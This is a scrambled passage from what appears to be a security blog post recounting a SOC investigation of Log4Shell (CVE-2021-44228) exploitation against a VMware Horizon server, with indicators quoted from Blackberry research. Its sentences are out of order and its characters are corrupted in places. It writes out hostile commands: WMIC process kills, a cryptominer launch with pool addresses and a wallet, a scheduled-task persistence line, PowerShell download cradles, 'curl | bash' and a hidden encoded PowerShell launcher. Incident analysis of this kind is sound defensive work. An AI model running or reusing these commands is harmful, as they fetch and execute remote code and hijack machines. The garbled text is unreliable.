"C:\Windows\System32\Wbem\WMIC.exe" process where "ExecutablePath like 'C:\\Users\\\\AppData\\Local\\Temp\\%'" delete “C:\Windows\System32\Wbem\WMIC.exe" process where "ExecutablePath like 'c:\\windows\\temp\\%'" delete "C:\Windows\system32\config\systemprofile\AppData\Roaming\network02.exe -donate-level 1 -o b.oracleservicetop -o 117:8080 -o 39:8080 -o 167.114.114169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B"Ĭleanup Examples “C:\Windows\system32\cmd.exe" /c del /f /q C:\ProgramData\Oracle\Java\java.exe” Scheduled Task Creation "C:\Windows\system32\schtasks.exe" /create /F /sc minute /mo 1 /tn BrowserUpdate /tr Typical Download Cradle IEX (New-Object Net.WebClient).DownloadString(‘’)Ĭurl Download Attempt cmd /C "curl | bash"Ĭryptocurrency Miner Download Example powershell iex(New-Object Net.WebClient).DownloadString('hxxp://6/xms.ps1') Post-exploitation evidences (from the Blackberry blog) Encoding Examples cmd /C "powershell -NonI -W Hidden -NoP -Exec Bypass -Enc We should have evidences of the backdoor being used in the logs of the "Web Reverse Proxy" component in the "Unified Access Gateway", which I've already required. Powershell -c $path=gwmi win32_service|?.oldīut maybe, you will have more luck than me in the meantime, according to VMWare Horizon documentation: The situation gets scary pretty quickly and we retrieve part of the payload from our IDS we decode it and after some magic receipts on our internal Cyberchef we are able to decode the inner payload hidden in the malicious Java class downloaded by the internal server as part of the successful exploitation. This time, with our internal server as a destination. On the same split second another rule from the Emerging Threats ET Pro ruleset triggered:ĮT ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2 The security shift under the Christmas holidays to me should be a moment to close incidents, send some wishes to the customers and focus on the (few) alerts triggered.Įverything began with the IDS triggering the following rule by FOX IT :įOX-SRT – Exploit – Possible Rogue JNDI LDAP Bind to External Observed (CVE-2021-44228)īasically an internal server contacted "something" behind a public IP using the LDAP protocol on port 80 OK, pretty suspicious but we need evidence that our "something" replied with a malicious payload. One of those days at the SOC, 2021 is almost over and the shift is flooded by alerts on the recently discovered CVE-2021-44228. The Blackberry Research
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |